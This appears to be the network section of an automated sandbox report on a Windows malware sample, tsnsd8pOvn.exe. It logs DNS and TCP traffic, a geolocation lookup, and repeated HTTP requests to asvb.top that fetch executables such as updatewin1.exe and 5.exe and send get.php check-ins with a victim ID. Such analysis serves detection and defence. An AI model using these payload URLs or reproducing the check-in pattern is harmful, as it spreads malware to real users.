                              Aug 26, 2024 23:31:08.776508093 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:09.086693048 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:09.086780071 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:09.086783886 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:09.086823940 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:09.090158939 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:09.090183973 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:13.829859018 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:13.829914093 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:13.829987049 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:13.837565899 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:13.837591887 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:14.765487909 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:14.765572071 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:14.770083904 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:14.770101070 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:14.770411968 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:14.770457983 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:14.772403955 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:14.812500954 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:15.144404888 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:15.144476891 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:15.144525051 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:15.144542933 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:15.144591093 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:15.145258904 CEST49712443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:15.145275116 CEST44349712188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:15.677911043 CEST4971380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.678591013 CEST4971480192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.683229923 CEST804971392.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:15.683300972 CEST4971380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.683552027 CEST4971380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.683764935 CEST804971492.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:15.683849096 CEST4971480192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.684024096 CEST4971480192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:15.688441038 CEST804971392.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:15.689821005 CEST804971492.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:16.505418062 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:16.505472898 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:16.505548954 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:16.580918074 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:16.580945015 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.039446115 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.039527893 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.044426918 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.044441938 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.044732094 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.044787884 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.050767899 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.096498013 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.409872055 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.409992933 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.410115957 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.410824060 CEST49716443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:17.410850048 CEST44349716188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:17.467629910 CEST4971780192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:17.480730057 CEST804971792.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:17.480866909 CEST4971780192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:17.481084108 CEST4971780192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:17.486506939 CEST804971792.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:26.583338022 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:26.583385944 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:26.583530903 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:26.595699072 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:26.595727921 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.064553976 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.064870119 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.069159985 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.069170952 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.069420099 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.069479942 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.070954084 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.112505913 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.641341925 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.641410112 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.641436100 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.641450882 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:27.641483068 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.641504049 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.642384052 CEST52636443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:27.642400026 CEST44352636188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:33.760535002 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:33.760582924 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:33.760659933 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:33.774259090 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:33.774272919 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.236222029 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.236398935 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.288965940 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.289000988 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.289366007 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.289432049 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.290932894 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.332501888 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.643965960 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.644030094 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.644046068 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.644076109 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:34.644089937 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.644123077 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.645071030 CEST52638443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:34.645087957 CEST44352638188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:37.061621904 CEST804971392.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:37.061693907 CEST4971380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.065268993 CEST804971492.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:37.065346956 CEST4971480192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.092986107 CEST4971380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.098150969 CEST804971392.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:37.125962973 CEST5263980192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.130903006 CEST805263992.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:37.131005049 CEST5263980192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.137922049 CEST5263980192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.142895937 CEST805263992.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:37.169688940 CEST4971480192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:37.174623013 CEST804971492.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:38.858669996 CEST804971792.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:38.858740091 CEST4971780192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:38.858875036 CEST4971780192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:38.863672018 CEST804971792.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:42.257122040 CEST5264080192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:42.262099028 CEST805264092.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:42.262176037 CEST5264080192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:42.262290001 CEST5264080192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:42.267386913 CEST805264092.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:43.866880894 CEST5264180192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:43.923269033 CEST805264192.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:43.923346996 CEST5264180192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:43.923597097 CEST5264180192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:43.928493023 CEST805264192.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:58.536209106 CEST805263992.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:58.536294937 CEST5263980192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:58.536349058 CEST5263980192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:58.539938927 CEST5264380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:58.541148901 CEST805263992.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:58.544709921 CEST805264392.246.89.93192.168.2.6
                              Aug 26, 2024 23:31:58.544781923 CEST5264380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:58.544892073 CEST5264380192.168.2.692.246.89.93
                              Aug 26, 2024 23:31:58.549726963 CEST805264392.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:03.640054941 CEST805264092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:03.640222073 CEST5264080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:03.640353918 CEST5264080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:03.645215034 CEST805264092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:05.302382946 CEST805264192.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:05.302517891 CEST5264180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:05.302609921 CEST5264180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:05.307456970 CEST805264192.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:08.694736004 CEST5264580192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:08.699738979 CEST805264592.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:08.699959040 CEST5264580192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:08.700051069 CEST5264580192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:08.704864979 CEST805264592.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:10.288813114 CEST5264680192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:10.293951988 CEST805264692.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:10.294033051 CEST5264680192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:10.294142962 CEST5264680192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:10.298995018 CEST805264692.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:19.926742077 CEST805264392.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:19.926942110 CEST5264380192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:19.927050114 CEST5264380192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:19.927730083 CEST5264880192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:19.933068037 CEST805264392.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:19.934060097 CEST805264892.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:19.934134960 CEST5264880192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:19.934225082 CEST5264880192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:19.939146042 CEST805264892.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:30.046989918 CEST805264592.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:30.047077894 CEST5264580192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:30.047202110 CEST5264580192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:30.053945065 CEST805264592.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:31.658415079 CEST805264692.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:31.658617020 CEST5264680192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:31.658858061 CEST5264680192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:31.663618088 CEST805264692.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:35.085500002 CEST5265080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:35.090423107 CEST805265092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:35.090480089 CEST5265080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:35.090600967 CEST5265080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:35.095562935 CEST805265092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:36.699498892 CEST5265180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:36.704358101 CEST805265192.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:36.704426050 CEST5265180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:36.704564095 CEST5265180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:36.709305048 CEST805265192.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:41.298706055 CEST805264892.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:41.298784971 CEST5264880192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:41.298901081 CEST5264880192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:41.300786018 CEST5265280192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:41.303824902 CEST805264892.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:41.305634975 CEST805265292.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:41.305711031 CEST5265280192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:41.305819988 CEST5265280192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:41.310565948 CEST805265292.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:56.445611954 CEST805265092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:56.445703030 CEST5265080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:56.445758104 CEST5265080192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:56.450593948 CEST805265092.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:58.064785957 CEST805265192.246.89.93192.168.2.6
                              Aug 26, 2024 23:32:58.064861059 CEST5265180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:58.064940929 CEST5265180192.168.2.692.246.89.93
                              Aug 26, 2024 23:32:58.069669962 CEST805265192.246.89.93192.168.2.6
                              Aug 26, 2024 23:33:02.658679008 CEST805265292.246.89.93192.168.2.6
                              Aug 26, 2024 23:33:02.658754110 CEST5265280192.168.2.692.246.89.93
                              Aug 26, 2024 23:33:02.658925056 CEST5265280192.168.2.692.246.89.93
                              Aug 26, 2024 23:33:02.660926104 CEST5265480192.168.2.692.246.89.93
                              Aug 26, 2024 23:33:02.664545059 CEST805265292.246.89.93192.168.2.6
                              Aug 26, 2024 23:33:02.666666031 CEST805265492.246.89.93192.168.2.6
                              Aug 26, 2024 23:33:02.666759014 CEST5265480192.168.2.692.246.89.93
                              Aug 26, 2024 23:33:02.667124033 CEST5265480192.168.2.692.246.89.93
                              Aug 26, 2024 23:33:02.672883034 CEST805265492.246.89.93192.168.2.6
                              TimestampSource PortDest PortSource IPDest IP
                              Aug 26, 2024 23:31:07.930958033 CEST6321053192.168.2.61.1.1.1
                              Aug 26, 2024 23:31:08.166330099 CEST53632101.1.1.1192.168.2.6
                              Aug 26, 2024 23:31:15.217793941 CEST5436953192.168.2.61.1.1.1
                              Aug 26, 2024 23:31:15.629057884 CEST53543691.1.1.1192.168.2.6
                              Aug 26, 2024 23:31:22.561281919 CEST53492181.1.1.1192.168.2.6
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 26, 2024 23:31:07.930958033 CEST192.168.2.61.1.1.10xf5c1Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                              Aug 26, 2024 23:31:15.217793941 CEST192.168.2.61.1.1.10x222bStandard query (0)asvb.topA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 26, 2024 23:31:08.166330099 CEST1.1.1.1192.168.2.60xf5c1No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
                              Aug 26, 2024 23:31:08.166330099 CEST1.1.1.1192.168.2.60xf5c1No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
                              Aug 26, 2024 23:31:15.629057884 CEST1.1.1.1192.168.2.60x222bNo error (0)asvb.top92.246.89.93A (IP address)IN (0x0001)false
                              • api.2ip.ua
                              • asvb.top
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.64971392.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:15.683552027 CEST103OUTGET /files/penelop/updatewin1.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.64971492.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:15.684024096 CEST143OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.64971792.246.89.93806408C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:17.481084108 CEST132OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.65263992.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:37.137922049 CEST103OUTGET /files/penelop/updatewin2.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.65264092.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:42.262290001 CEST143OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.65264192.246.89.93806408C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:43.923597097 CEST132OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.65264392.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:31:58.544892073 CEST102OUTGET /files/penelop/updatewin.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.65264592.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:08.700051069 CEST143OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.65264692.246.89.93806408C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:10.294142962 CEST132OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.65264892.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:19.934225082 CEST94OUTGET /files/penelop/3.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.65265092.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:35.090600967 CEST143OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.65265192.246.89.93806408C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:36.704564095 CEST132OUTGET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.65265292.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:32:41.305819988 CEST94OUTGET /files/penelop/4.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.65265492.246.89.9380416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              Aug 26, 2024 23:33:02.667124033 CEST94OUTGET /files/penelop/5.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649711188.114.97.3443972C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 21:31:08 UTC85OUTGET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:09 UTC891INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:09 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xi451NrdE4jWxBV7uftuM4tNTmGfWjb%2FyDiROLCLd3o3FaYcsg98ET3I7FFr%2BkVaOx8ymSibh3GxG%2B0oy91Jw2kaew2a5WQvbcpoqwU46F67i8k%2FcGSyB5rtxLv"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed53ea757d13-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:09 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:09 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649712188.114.97.3443416C:\Users\user\Desktop\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 21:31:14 UTC85OUTGET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:15 UTC893INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:15 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVNpJCkXM%2BUo8hCcuxejGyzB9KBYUK%2FqkpE7aOTxQCAH%2FthRJTGncBtLKuDoWbWxIZ3gbJPkGTsOSh4BmmQ4eSLJTIo%2BcndSHu023Ri74u06Z5EBoF9CEMpw6GF%2F"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed79ce485e7a-EWR
                              alt-svc: h3=":443"; ma=86400
